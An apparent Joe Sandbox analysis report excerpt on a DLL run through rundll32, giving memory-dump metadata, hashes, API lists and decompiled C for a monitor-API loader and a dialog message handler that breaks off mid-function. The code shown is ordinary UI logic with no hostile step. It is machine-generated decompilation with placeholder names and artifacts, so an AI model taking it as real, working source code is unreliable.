                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: String$Variant$ClearFree_memset$ChangeException@8H_prolog3ThrowTypelstrlen
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 4128688680-0
                                                                                                                                    • Opcode ID: 6192f18373e1637f38ae635fdb485c2c49157f7b8aa44aff1f0335ddf822a966
                                                                                                                                    • Instruction ID: 42fa242583032f4c72b1ee8c19c4a820194bcb4b4a787a5525753aa98076571e
                                                                                                                                    • Opcode Fuzzy Hash: 6192f18373e1637f38ae635fdb485c2c49157f7b8aa44aff1f0335ddf822a966
                                                                                                                                    • Instruction Fuzzy Hash: 5EF18A7490025ADFDF11DFA8D880AEEBBB4FF05300F90406AE951AB2A1D774AE56CF50
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 97%
                                                                                                                                    			E10018B59() {
                                                                                                                                    				void* __ebx;
                                                                                                                                    				void* __esi;
                                                                                                                                    				struct HINSTANCE__* _t5;
                                                                                                                                    				_Unknown_base(*)()* _t6;
                                                                                                                                    				_Unknown_base(*)()* _t7;
                                                                                                                                    				_Unknown_base(*)()* _t8;
                                                                                                                                    				_Unknown_base(*)()* _t9;
                                                                                                                                    				_Unknown_base(*)()* _t10;
                                                                                                                                    				_Unknown_base(*)()* _t11;
                                                                                                                                    				_Unknown_base(*)()* _t12;
                                                                                                                                    				struct HINSTANCE__* _t18;
                                                                                                                                    				void* _t20;
                                                                                                                                    				intOrPtr _t23;
                                                                                                                                    				_Unknown_base(*)()* _t24;
                                                                                                                                    
                                                                                                                                    				_t23 =  *0x100572e4; // 0x0
                                                                                                                                    				if(_t23 == 0) {
                                                                                                                                    					_push(_t20);
                                                                                                                                    					 *0x100572e8 = E10018B01(0, _t20, __eflags);
                                                                                                                                    					_t18 = GetModuleHandleA("USER32");
                                                                                                                                    					__eflags = _t18;
                                                                                                                                    					if(_t18 == 0) {
                                                                                                                                    						L12:
                                                                                                                                    						 *0x100572c8 = 0;
                                                                                                                                    						 *0x100572cc = 0;
                                                                                                                                    						 *0x100572d0 = 0;
                                                                                                                                    						 *0x100572d4 = 0;
                                                                                                                                    						 *0x100572d8 = 0;
                                                                                                                                    						 *0x100572dc = 0;
                                                                                                                                    						 *0x100572e0 = 0;
                                                                                                                                    						_t5 = 0;
                                                                                                                                    					} else {
                                                                                                                                    						_t6 = GetProcAddress(_t18, "GetSystemMetrics");
                                                                                                                                    						__eflags = _t6;
                                                                                                                                    						 *0x100572c8 = _t6;
                                                                                                                                    						if(_t6 == 0) {
                                                                                                                                    							goto L12;
                                                                                                                                    						} else {
                                                                                                                                    							_t7 = GetProcAddress(_t18, "MonitorFromWindow");
                                                                                                                                    							__eflags = _t7;
                                                                                                                                    							 *0x100572cc = _t7;
                                                                                                                                    							if(_t7 == 0) {
                                                                                                                                    								goto L12;
                                                                                                                                    							} else {
                                                                                                                                    								_t8 = GetProcAddress(_t18, "MonitorFromRect");
                                                                                                                                    								__eflags = _t8;
                                                                                                                                    								 *0x100572d0 = _t8;
                                                                                                                                    								if(_t8 == 0) {
                                                                                                                                    									goto L12;
                                                                                                                                    								} else {
                                                                                                                                    									_t9 = GetProcAddress(_t18, "MonitorFromPoint");
                                                                                                                                    									__eflags = _t9;
                                                                                                                                    									 *0x100572d4 = _t9;
                                                                                                                                    									if(_t9 == 0) {
                                                                                                                                    										goto L12;
                                                                                                                                    									} else {
                                                                                                                                    										_t10 = GetProcAddress(_t18, "EnumDisplayMonitors");
                                                                                                                                    										__eflags = _t10;
                                                                                                                                    										 *0x100572dc = _t10;
                                                                                                                                    										if(_t10 == 0) {
                                                                                                                                    											goto L12;
                                                                                                                                    										} else {
                                                                                                                                    											_t11 = GetProcAddress(_t18, "GetMonitorInfoA");
                                                                                                                                    											__eflags = _t11;
                                                                                                                                    											 *0x100572d8 = _t11;
                                                                                                                                    											if(_t11 == 0) {
                                                                                                                                    												goto L12;
                                                                                                                                    											} else {
                                                                                                                                    												_t12 = GetProcAddress(_t18, "EnumDisplayDevicesA");
                                                                                                                                    												__eflags = _t12;
                                                                                                                                    												 *0x100572e0 = _t12;
                                                                                                                                    												if(_t12 == 0) {
                                                                                                                                    													goto L12;
                                                                                                                                    												} else {
                                                                                                                                    													_t5 = 1;
                                                                                                                                    													__eflags = 1;
                                                                                                                                    												}
                                                                                                                                    											}
                                                                                                                                    										}
                                                                                                                                    									}
                                                                                                                                    								}
                                                                                                                                    							}
                                                                                                                                    						}
                                                                                                                                    					}
                                                                                                                                    					 *0x100572e4 = 1;
                                                                                                                                    					return _t5;
                                                                                                                                    				} else {
                                                                                                                                    					_t24 =  *0x100572d8; // 0x0
                                                                                                                                    					return 0 | _t24 != 0x00000000;
                                                                                                                                    				}
                                                                                                                                    			}


















                                                                                                                                    APIs
                                                                                                                                    • GetModuleHandleA.KERNEL32(USER32,00000000,00000000,754A7F34,10018CA5,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018B82
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetSystemMetrics,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018B9E
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,MonitorFromWindow,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018BAF
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,MonitorFromRect,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018BC0
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,MonitorFromPoint,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018BD1
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018BE2
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018BF3
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,EnumDisplayDevicesA,?,?,?,?,?,?,?,1001AB36,00000000,00000002,00000028), ref: 10018C04
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464918523.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464912255.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464976774.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464991878.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465001079.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                    • Associated: 00000009.00000002.465009024.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AddressProc$HandleModule
                                                                                                                                    • String ID: EnumDisplayDevicesA$EnumDisplayMonitors$GetMonitorInfoA$GetSystemMetrics$MonitorFromPoint$MonitorFromRect$MonitorFromWindow$USER32
                                                                                                                                    • API String ID: 667068680-68207542
                                                                                                                                    • Opcode ID: ef20b1205fbe14ac9d2a40522549883dc0a7ccf4399eb4921ca3be0b95f38340
                                                                                                                                    • Instruction ID: 77f58ff47d83721d02e0aa712f7cb6554a3c60b1de10c844b6b889dbd48dd915
                                                                                                                                    • Opcode Fuzzy Hash: ef20b1205fbe14ac9d2a40522549883dc0a7ccf4399eb4921ca3be0b95f38340
                                                                                                                                    • Instruction Fuzzy Hash: 40213071902121AAE751DF25ADC046DBAEAF349280F61093FF10CD6560D7309AC6AFA9
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 83%
                                                                                                                                    			E1002A778(void* __ebx, signed int __ecx, void* __edi, void* __esi, void* __eflags, signed int _a4, struct tagMSG* _a8, intOrPtr _a12) {
                                                                                                                                    				signed int _v8;
                                                                                                                                    				signed int _v24;
                                                                                                                                    				int _v28;
                                                                                                                                    				intOrPtr _v32;
                                                                                                                                    				intOrPtr _v36;
                                                                                                                                    				intOrPtr _v40;
                                                                                                                                    				signed int _v44;
                                                                                                                                    				signed int _v48;
                                                                                                                                    				struct HWND__* _v52;
                                                                                                                                    				signed int _t139;
                                                                                                                                    				signed int _t141;
                                                                                                                                    				void* _t142;
                                                                                                                                    				signed int _t146;
                                                                                                                                    				signed int _t149;
                                                                                                                                    				intOrPtr _t150;
                                                                                                                                    				signed int _t152;
                                                                                                                                    				signed char _t153;
                                                                                                                                    				signed int _t154;
                                                                                                                                    				signed int _t155;
                                                                                                                                    				int _t156;
                                                                                                                                    				signed int _t161;
                                                                                                                                    				signed int _t165;
                                                                                                                                    				void* _t167;
                                                                                                                                    				signed char _t171;
                                                                                                                                    				signed int _t172;
                                                                                                                                    				signed int _t173;
                                                                                                                                    				signed int _t174;
                                                                                                                                    				signed char _t182;
                                                                                                                                    				intOrPtr _t183;
                                                                                                                                    				signed int _t184;
                                                                                                                                    				short _t188;
                                                                                                                                    				signed int _t189;
                                                                                                                                    				signed int _t190;
                                                                                                                                    				signed int _t191;
                                                                                                                                    				signed int _t195;
                                                                                                                                    				signed int _t198;
                                                                                                                                    				signed char _t199;
                                                                                                                                    				signed int _t200;
                                                                                                                                    				signed int _t201;
                                                                                                                                    				short _t204;
                                                                                                                                    				signed int _t206;
                                                                                                                                    				signed int _t207;
                                                                                                                                    				signed int _t208;
                                                                                                                                    				signed int _t209;
                                                                                                                                    				void* _t211;
                                                                                                                                    				signed int _t215;
                                                                                                                                    				signed int _t216;
                                                                                                                                    				struct HWND__* _t217;
                                                                                                                                    				struct tagMSG* _t221;
                                                                                                                                    				intOrPtr _t224;
                                                                                                                                    				void* _t231;
                                                                                                                                    				struct tagMSG* _t240;
                                                                                                                                    				signed int _t242;
                                                                                                                                    				int _t243;
                                                                                                                                    				signed int _t244;
                                                                                                                                    				long _t247;
                                                                                                                                    				intOrPtr _t249;
                                                                                                                                    				signed int _t251;
                                                                                                                                    				signed int _t254;
                                                                                                                                    				signed int _t255;
                                                                                                                                    				signed int _t256;
                                                                                                                                    				signed int _t257;
                                                                                                                                    				signed int _t258;
                                                                                                                                    				void* _t260;
                                                                                                                                    				void* _t262;
                                                                                                                                    
                                                                                                                                    				_t232 = __ecx;
                                                                                                                                    				_t260 = _t262;
                                                                                                                                    				_push(__ecx);
                                                                                                                                    				_v8 = _v8 & 0x00000000;
                                                                                                                                    				_push(__ebx);
                                                                                                                                    				_push(__esi);
                                                                                                                                    				_push(__edi);
                                                                                                                                    				_t139 = E1002A5D5(_a4, _a8);
                                                                                                                                    				_t238 = _t139;
                                                                                                                                    				if(_t139 == 0) {
                                                                                                                                    					_t232 = _a4;
                                                                                                                                    					_t231 = E100199B2(_a4);
                                                                                                                                    					if(_t231 != 0) {
                                                                                                                                    						_t221 =  *((intOrPtr*)(_t231 + 0x44));
                                                                                                                                    						_a8 = _t221;
                                                                                                                                    						if(_t221 != 0) {
                                                                                                                                    							while(1) {
                                                                                                                                    								_t9 = _t231 + 0x40; // 0x40
                                                                                                                                    								_t232 = _t9;
                                                                                                                                    								_t258 =  *(E10017B95( &_a8));
                                                                                                                                    								_t224 =  *((intOrPtr*)(_t258 + 4));
                                                                                                                                    								if(_t224 != 0 && _t224 ==  *((intOrPtr*)(_t231 + 0x70))) {
                                                                                                                                    									break;
                                                                                                                                    								}
                                                                                                                                    								if( *_t258 == 0 ||  *_t258 != GetFocus()) {
                                                                                                                                    									if(_a8 != 0) {
                                                                                                                                    										continue;
                                                                                                                                    									} else {
                                                                                                                                    									}
                                                                                                                                    								} else {
                                                                                                                                    									break;
                                                                                                                                    								}
                                                                                                                                    								goto L10;
                                                                                                                                    							}
                                                                                                                                    							_t238 = _t258;
                                                                                                                                    						}
                                                                                                                                    					}
                                                                                                                                    				}
                                                                                                                                    				L10:
                                                                                                                                    				_t247 = 0;
                                                                                                                                    				while(1) {
                                                                                                                                    					_t238 = E1002A627(_t232, _a4, _t238, _a12);
                                                                                                                                    					if(_t238 == 0) {
                                                                                                                                    						break;
                                                                                                                                    					}
                                                                                                                                    					_t142 = E1002A0D2(_t238);
                                                                                                                                    					_pop(_t232);
                                                                                                                                    					if(_t142 == 0) {
                                                                                                                                    						L14:
                                                                                                                                    						if(_t238 == 0) {
                                                                                                                                    							L21:
                                                                                                                                    							__eflags =  *(_t238 + 4);
                                                                                                                                    							if( *(_t238 + 4) == 0) {
                                                                                                                                    								E100201F1(_t232);
                                                                                                                                    								asm("int3");
                                                                                                                                    								_push(0x28);
                                                                                                                                    								E10030D5A(E10044D1A, 0, _t238, _t247);
                                                                                                                                    								_t146 = _a4;
                                                                                                                                    								__eflags = _t146;
                                                                                                                                    								if(_t146 != 0) {
                                                                                                                                    									_v48 =  *((intOrPtr*)(_t146 + 0x20));
                                                                                                                                    								} else {
                                                                                                                                    									_v48 = _v48 & _t146;
                                                                                                                                    								}
                                                                                                                                    								_t240 = _a8;
                                                                                                                                    								_t249 = _t240->message;
                                                                                                                                    								_v32 = _t249;
                                                                                                                                    								_v52 = GetFocus();
                                                                                                                                    								_t149 = E1001B042(0, _t260, _t148);
                                                                                                                                    								_t229 = 0x100;
                                                                                                                                    								__eflags = _t249 - 0x100;
                                                                                                                                    								_v24 = _t149;
                                                                                                                                    								if(_t249 < 0x100) {
                                                                                                                                    									L34:
                                                                                                                                    									__eflags = _t249 + 0xfffffe00 - 9;
                                                                                                                                    									if(_t249 + 0xfffffe00 > 9) {
                                                                                                                                    										goto L56;
                                                                                                                                    									} else {
                                                                                                                                    										goto L35;
                                                                                                                                    									}
                                                                                                                                    								} else {
                                                                                                                                    									__eflags = _t249 - 0x109;
                                                                                                                                    									if(_t249 <= 0x109) {
                                                                                                                                    										L35:
                                                                                                                                    										__eflags = _t149;
                                                                                                                                    										if(_t149 == 0) {
                                                                                                                                    											L56:
                                                                                                                                    											_t251 = 0;
                                                                                                                                    											_v28 = 0;
                                                                                                                                    											_t150 = E1001B042(_t229, _t260,  *_t240);
                                                                                                                                    											_v44 = _v44 & 0;
                                                                                                                                    											_v36 = _t150;
                                                                                                                                    											_t152 = _v32 - _t229;
                                                                                                                                    											__eflags = _t152;
                                                                                                                                    											_v40 = 2;
                                                                                                                                    											if(_t152 == 0) {
                                                                                                                                    												_t153 = E1002A085(_v36, _t240);
                                                                                                                                    												_t232 =  *(_t240 + 8) & 0x0000ffff;
                                                                                                                                    												__eflags = _t232 - 0x1b;
                                                                                                                                    												if(__eflags > 0) {
                                                                                                                                    													__eflags = _t232 - 0x25;
                                                                                                                                    													if(_t232 < 0x25) {
                                                                                                                                    														goto L75;
                                                                                                                                    													} else {
                                                                                                                                    														__eflags = _t232 - 0x26;
                                                                                                                                    														if(_t232 <= 0x26) {
                                                                                                                                    															_v44 = 1;
                                                                                                                                    															goto L110;
                                                                                                                                    														} else {
                                                                                                                                    															__eflags = _t232 - 0x28;
                                                                                                                                    															if(_t232 <= 0x28) {
                                                                                                                                    																L110:
                                                                                                                                    																_t171 = E1002A085(_v24, _t240);
                                                                                                                                    																__eflags = _t171 & 0x00000001;
                                                                                                                                    																if((_t171 & 0x00000001) != 0) {
                                                                                                                                    																	goto L75;
                                                                                                                                    																} else {
                                                                                                                                    																	__eflags = _v44;
                                                                                                                                    																	_t232 = _a4;
                                                                                                                                    																	_push(0);
                                                                                                                                    																	if(_v44 == 0) {
                                                                                                                                    																		_t172 = E1001E706(_t232);
                                                                                                                                    																	} else {
                                                                                                                                    																		_t172 = E1001E6B8(_t232);
                                                                                                                                    																	}
                                                                                                                                    																	_t254 = _t172;
                                                                                                                                    																	__eflags = _t254;
                                                                                                                                    																	if(_t254 == 0) {
                                                                                                                                    																		goto L75;
                                                                                                                                    																	} else {
                                                                                                                                    																		__eflags =  *(_t254 + 8);
                                                                                                                                    																		if( *(_t254 + 8) != 0) {
                                                                                                                                    																			_t232 = _a4;
                                                                                                                                    																			E1001E262(_a4, _t254);
                                                                                                                                    																		}
                                                                                                                                    																		__eflags =  *(_t254 + 4);
                                                                                                                                    																		if( *(_t254 + 4) == 0) {
                                                                                                                                    																			_t173 =  *_t254;
                                                                                                                                    																			__eflags = _t173;
                                                                                                                                    																			if(_t173 == 0) {
                                                                                                                                    																				_t232 = _a4;
                                                                                                                                    																				_t174 = E1002A143(_a4, _v24, _v44);
                                                                                                                                    																			} else {
                                                                                                                                    																				_t174 = E1001B042(_t229, _t260, _t173);
                                                                                                                                    																			}
                                                                                                                                    																			_t242 = _t174;
                                                                                                                                    																			__eflags = _t242;
                                                                                                                                    																			if(_t242 == 0) {
                                                                                                                                    																				goto L75;
                                                                                                                                    																			} else {
                                                                                                                                    																				_t229 = 0;
                                                                                                                                    																				 *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x4c)) + 0x70)) = 0;
                                                                                                                                    																				E1002A17D(_t242);
                                                                                                                                    																				__eflags =  *(_t254 + 8);
                                                                                                                                    																				if( *(_t254 + 8) != 0) {
                                                                                                                                    																					SendMessageA( *(_t242 + 0x20), 0xf1, 1, 0);
                                                                                                                                    																				}
                                                                                                                                    																				goto L125;
                                                                                                                                    																			}
                                                                                                                                    																		} else {
                                                                                                                                    																			_t232 =  *(_t254 + 4);
                                                                                                                                    																			 *((intOrPtr*)( *( *(_t254 + 4)) + 0xac))(_t240);
                                                                                                                                    																			goto L125;
                                                                                                                                    																		}
                                                                                                                                    																	}
                                                                                                                                    																}
                                                                                                                                    															} else {
                                                                                                                                    																__eflags = _t232 - 0x2b;
                                                                                                                                    																if(_t232 != 0x2b) {
                                                                                                                                    																	goto L75;
                                                                                                                                    																} else {
                                                                                                                                    																	goto L97;
                                                                                                                                    																}
                                                                                                                                    															}
                                                                                                                                    														}
                                                                                                                                    													}
                                                                                                                                    													goto L126;
                                                                                                                                    												} else {
                                                                                                                                    													if(__eflags == 0) {
                                                                                                                                    														L103:
                                                                                                                                    														_t243 = 0;
                                                                                                                                    														__eflags = 0;
                                                                                                                                    														goto L104;
                                                                                                                                    													} else {
                                                                                                                                    														__eflags = _t232 - 3;
                                                                                                                                    														if(_t232 == 3) {
                                                                                                                                    															goto L103;
                                                                                                                                    														} else {
                                                                                                                                    															__eflags = _t232 - 9;
                                                                                                                                    															if(_t232 == 9) {
                                                                                                                                    																__eflags = _t153 & 0x00000002;
                                                                                                                                    																if((_t153 & 0x00000002) != 0) {
                                                                                                                                    																	goto L75;
                                                                                                                                    																} else {
                                                                                                                                    																	_t188 = GetKeyState(0x10);
                                                                                                                                    																	_t255 = _a4;
                                                                                                                                    																	__eflags = _t188;
                                                                                                                                    																	_t229 = 0 | _t188 < 0x00000000;
                                                                                                                                    																	_t232 = _t255;
                                                                                                                                    																	_t189 = E1001E11F(_t255, 0, _t188 < 0);
                                                                                                                                    																	__eflags = _t189;
                                                                                                                                    																	if(_t189 == 0) {
                                                                                                                                    																		goto L75;
                                                                                                                                    																	} else {
                                                                                                                                    																		__eflags =  *(_t189 + 4);
                                                                                                                                    																		if( *(_t189 + 4) == 0) {
                                                                                                                                    																			_t190 =  *_t189;
                                                                                                                                    																			__eflags = _t190;
                                                                                                                                    																			if(_t190 == 0) {
                                                                                                                                    																				_t232 = _t255;
                                                                                                                                    																				_t191 = E10016D48(_t255, _v36, _t229);
                                                                                                                                    																			} else {
                                                                                                                                    																				_t191 = E1001B042(_t229, _t260, _t190);
                                                                                                                                    																			}
                                                                                                                                    																			_t244 = _t191;
                                                                                                                                    																			__eflags = _t244;
                                                                                                                                    																			if(_t244 != 0) {
                                                                                                                                    																				 *( *((intOrPtr*)(_t255 + 0x4c)) + 0x70) =  *( *((intOrPtr*)(_t255 + 0x4c)) + 0x70) & 0x00000000;
                                                                                                                                    																				E1002A17D(_t244);
                                                                                                                                    																				E1002A347(_t229, _t232, _t260, _v24, _t244);
                                                                                                                                    																				_pop(_t232);
                                                                                                                                    																			}
                                                                                                                                    																		} else {
                                                                                                                                    																			_t195 =  *(_t189 + 4);
                                                                                                                                    																			_t232 = _t195;
                                                                                                                                    																			 *((intOrPtr*)( *_t195 + 0xac))(_t240);
                                                                                                                                    																		}
                                                                                                                                    																		goto L125;
                                                                                                                                    																	}
                                                                                                                                    																}
                                                                                                                                    																goto L126;
                                                                                                                                    															} else {
                                                                                                                                    																__eflags = _t232 - 0xd;
                                                                                                                                    																if(_t232 == 0xd) {
                                                                                                                                    																	L97:
                                                                                                                                    																	__eflags = _t153 & 0x00000004;
                                                                                                                                    																	if((_t153 & 0x00000004) != 0) {
                                                                                                                                    																		goto L75;
                                                                                                                                    																	} else {
                                                                                                                                    																		_t182 = E1002A122(_v24);
                                                                                                                                    																		__eflags = _t182 & 0x00000010;
                                                                                                                                    																		_pop(_t232);
                                                                                                                                    																		if((_t182 & 0x00000010) == 0) {
                                                                                                                                    																			_t183 = E1002A4C8(_a4);
                                                                                                                                    																		} else {
                                                                                                                                    																			_t251 = _v24;
                                                                                                                                    																			_t232 = _t251;
                                                                                                                                    																			_t183 = E1001DE35(_t251);
                                                                                                                                    																		}
                                                                                                                                    																		_t243 = 0;
                                                                                                                                    																		__eflags = _t251;
                                                                                                                                    																		_v40 = _t183;
                                                                                                                                    																		if(_t251 != 0) {
                                                                                                                                    																			L105:
                                                                                                                                    																			_t232 = _t251;
                                                                                                                                    																			_t184 = E1001DEAF(_t251);
                                                                                                                                    																			__eflags = _t184;
                                                                                                                                    																			if(_t184 != 0) {
                                                                                                                                    																				__eflags =  *((intOrPtr*)(_t251 + 0x50)) - _t243;
                                                                                                                                    																				if( *((intOrPtr*)(_t251 + 0x50)) == _t243) {
                                                                                                                                    																					goto L75;
                                                                                                                                    																				} else {
                                                                                                                                    																					_push(_t243);
                                                                                                                                    																					_push(_t243);
                                                                                                                                    																					_push(_t243);
                                                                                                                                    																					_push(1);
                                                                                                                                    																					_push(0xfffffdd9);
                                                                                                                                    																					_push(_t251);
                                                                                                                                    																					_v8 = _t243;
                                                                                                                                    																					E1001DF0C();
                                                                                                                                    																					_v8 = _v8 | 0xffffffff;
                                                                                                                                    																					goto L125;
                                                                                                                                    																				}
                                                                                                                                    																			} else {
                                                                                                                                    																				MessageBeep(_t243);
                                                                                                                                    																				goto L75;
                                                                                                                                    																			}
                                                                                                                                    																		} else {
                                                                                                                                    																			L104:
                                                                                                                                    																			_t251 = E1002A3C2(_a4, _v40);
                                                                                                                                    																			__eflags = _t251 - _t243;
                                                                                                                                    																			if(_t251 == _t243) {
                                                                                                                                    																				goto L75;
                                                                                                                                    																			} else {
                                                                                                                                    																				goto L105;
                                                                                                                                    																			}
                                                                                                                                    																		}
                                                                                                                                    																	}
                                                                                                                                    																	goto L126;
                                                                                                                                    																} else {
                                                                                                                                    																	goto L75;
                                                                                                                                    																}
                                                                                                                                    															}
                                                                                                                                    														}
                                                                                                                                    													}
                                                                                                                                    												}
                                                                                                                                    												goto L79;
                                                                                                                                    											} else {
                                                                                                                                    												_t198 = _t152;
                                                                                                                                    												__eflags = _t198;
                                                                                                                                    												if(_t198 == 0) {
                                                                                                                                    													L62:
                                                                                                                                    													_t199 = E1002A085(_v36, _t240);
                                                                                                                                    													__eflags = _v32 - 0x102;
                                                                                                                                    													if(_v32 != 0x102) {
                                                                                                                                    														L64:
                                                                                                                                    														_t232 =  *(_t240 + 8) & 0x0000ffff;
                                                                                                                                    														__eflags = _t232 - 9;
                                                                                                                                    														if(_t232 != 9) {
                                                                                                                                    															L66:
                                                                                                                                    															__eflags = _t232 - 0x20;
                                                                                                                                    															if(__eflags == 0) {
                                                                                                                                    																goto L54;
                                                                                                                                    															} else {
                                                                                                                                    																_push(_t240);
                                                                                                                                    																_t200 = E1002A778(_t229, _t232, _t240, _t251, __eflags, _a4, _v36);
                                                                                                                                    																__eflags = _t200;
                                                                                                                                    																if(_t200 == 0) {
                                                                                                                                    																	goto L75;
                                                                                                                                    																} else {
                                                                                                                                    																	_t201 =  *(_t200 + 4);
                                                                                                                                    																	__eflags = _t201;
                                                                                                                                    																	if(_t201 == 0) {
                                                                                                                                    																		goto L75;
                                                                                                                                    																	} else {
                                                                                                                                    																		_t232 = _t201;
                                                                                                                                    																		E100246E1(_t201, _t240);
                                                                                                                                    																		L125:
                                                                                                                                    																		_v28 = 1;
                                                                                                                                    																	}
                                                                                                                                    																}
                                                                                                                                    																goto L79;
                                                                                                                                    															}
                                                                                                                                    														} else {
                                                                                                                                    															__eflags = _t199 & 0x00000002;
                                                                                                                                    															if((_t199 & 0x00000002) != 0) {
                                                                                                                                    																goto L75;
                                                                                                                                    															} else {
                                                                                                                                    																goto L66;
                                                                                                                                    															}
                                                                                                                                    														}
                                                                                                                                    													} else {
                                                                                                                                    														__eflags = _t199 & 0x00000084;
                                                                                                                                    														if((_t199 & 0x00000084) != 0) {
                                                                                                                                    															goto L75;
                                                                                                                                    														} else {
                                                                                                                                    															goto L64;
                                                                                                                                    														}
                                                                                                                                    													}
                                                                                                                                    												} else {
                                                                                                                                    													__eflags = _t198 != 4;
                                                                                                                                    													if(_t198 != 4) {
                                                                                                                                    														L75:
                                                                                                                                    														_t154 = _a4;
                                                                                                                                    														__eflags =  *(_t154 + 0x3c) & 0x00001000;
                                                                                                                                    														if(( *(_t154 + 0x3c) & 0x00001000) == 0) {
                                                                                                                                    															_t165 = IsDialogMessageA( *(_t154 + 0x20), _a8);
                                                                                                                                    															__eflags = _t165;
                                                                                                                                    															_v28 = _t165;
                                                                                                                                    															if(_t165 != 0) {
                                                                                                                                    																_t167 = E1001B042(_t229, _t260, GetFocus());
                                                                                                                                    																__eflags = _t167 - _v24;
                                                                                                                                    																if(_t167 != _v24) {
                                                                                                                                    																	E1002A2DA(_t232, E1001B042(_t229, _t260, GetFocus()));
                                                                                                                                    																	_pop(_t232);
                                                                                                                                    																}
                                                                                                                                    															}
                                                                                                                                    														}
                                                                                                                                    														L79:
                                                                                                                                    														_t155 = IsWindow(_v52);
                                                                                                                                    														__eflags = _t155;
                                                                                                                                    														if(_t155 != 0) {
                                                                                                                                    															E1002A347(_t229, _t232, _t260, _v24, E1001B042(_t229, _t260, GetFocus()));
                                                                                                                                    															_t161 = IsWindow(_v48);
                                                                                                                                    															__eflags = _t161;
                                                                                                                                    															if(_t161 != 0) {
                                                                                                                                    																E1002A4F5(_a4, _v24, E1001B042(_t229, _t260, GetFocus()));
                                                                                                                                    															}
                                                                                                                                    														}
                                                                                                                                    														_t156 = _v28;
                                                                                                                                    													} else {
                                                                                                                                    														__eflags = _v24;
                                                                                                                                    														if(_v24 != 0) {
                                                                                                                                    															L61:
                                                                                                                                    															__eflags =  *(_t240 + 8) - 0x20;
                                                                                                                                    															if( *(_t240 + 8) == 0x20) {
                                                                                                                                    																goto L75;
                                                                                                                                    															} else {
                                                                                                                                    																goto L62;
                                                                                                                                    															}
                                                                                                                                    														} else {
                                                                                                                                    															_t204 = GetKeyState(0x12);
                                                                                                                                    															__eflags = _t204;
                                                                                                                                    															if(_t204 >= 0) {
                                                                                                                                    																goto L75;
                                                                                                                                    															} else {
                                                                                                                                    																goto L61;
                                                                                                                                    															}
                                                                                                                                    														}
                                                                                                                                    													}
                                                                                                                                    												}
                                                                                                                                    											}
                                                                                                                                    										} else {
                                                                                                                                    											_t256 = _t149;
                                                                                                                                    											while(1) {
                                                                                                                                    												__eflags =  *(_t256 + 0x50);
                                                                                                                                    												if( *(_t256 + 0x50) != 0) {
                                                                                                                                    													break;
                                                                                                                                    												}
                                                                                                                                    												_t211 = E1001B042(_t229, _t260, GetParent( *(_t256 + 0x20)));
                                                                                                                                    												__eflags = _t211 - _a4;
                                                                                                                                    												if(_t211 != _a4) {
                                                                                                                                    													_t256 = E1001B042(_t229, _t260, GetParent( *(_t256 + 0x20)));
                                                                                                                                    													__eflags = _t256;
                                                                                                                                    													if(_t256 != 0) {
                                                                                                                                    														continue;
                                                                                                                                    													}
                                                                                                                                    												}
                                                                                                                                    												break;
                                                                                                                                    											}
                                                                                                                                    											__eflags = _t256;
                                                                                                                                    											if(_t256 == 0) {
                                                                                                                                    												L45:
                                                                                                                                    												__eflags = _v32 - 0x101;
                                                                                                                                    												if(_v32 == 0x101) {
                                                                                                                                    													L48:
                                                                                                                                    													__eflags = _t256;
                                                                                                                                    													if(_t256 == 0) {
                                                                                                                                    														goto L55;
                                                                                                                                    													} else {
                                                                                                                                    														_t257 =  *(_t256 + 0x50);
                                                                                                                                    														__eflags = _t257;
                                                                                                                                    														if(_t257 == 0) {
                                                                                                                                    															goto L55;
                                                                                                                                    														} else {
                                                                                                                                    															_t206 = _a8->wParam & 0x0000ffff;
